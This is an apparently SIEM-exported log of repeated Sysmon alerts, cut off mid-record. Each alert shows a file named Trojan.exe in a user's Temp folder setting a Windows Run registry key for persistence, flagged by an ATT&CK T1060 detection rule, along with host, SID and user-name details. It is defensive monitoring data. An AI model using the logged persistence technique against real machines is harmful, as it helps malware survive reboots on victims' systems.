HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:58.060"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.675",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:57.053 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:57.102558900Z"",""eventRecordID"":""1359"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:57.053\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:57.053"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:30.645",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:56.005 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:56.008002600Z"",""eventRecordID"":""1357"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:56.005\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:56.005"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.629",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:54.997 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:54.998740900Z"",""eventRecordID"":""1356"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:54.997\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:54.997"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.582",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:53.995 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:54.001206900Z"",""eventRecordID"":""1353"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:53.995\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:53.995"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:30.441",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:52.987 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:52.988480400Z"",""eventRecordID"":""1348"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:52.987\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:52.987"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.425",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:51.982 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:51.999599900Z"",""eventRecordID"":""1347"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:51.982\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:51.982"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.395",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:50.966 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:50.973425400Z"",""eventRecordID"":""1346"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:50.966\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:50.966"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:30.364",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:49.950 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:49.952753000Z"",""eventRecordID"":""1345"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:49.950\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:49.950"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:22.805",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:48.935 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:48.939279000Z"",""eventRecordID"":""1344"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:48.935\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:48.935"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:14.202",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:47.919 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:47.922383300Z"",""eventRecordID"":""1342"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:47.919\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:47.919"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:13.765",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:46.906 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:46.980470200Z"",""eventRecordID"":""1340"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:46.906\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 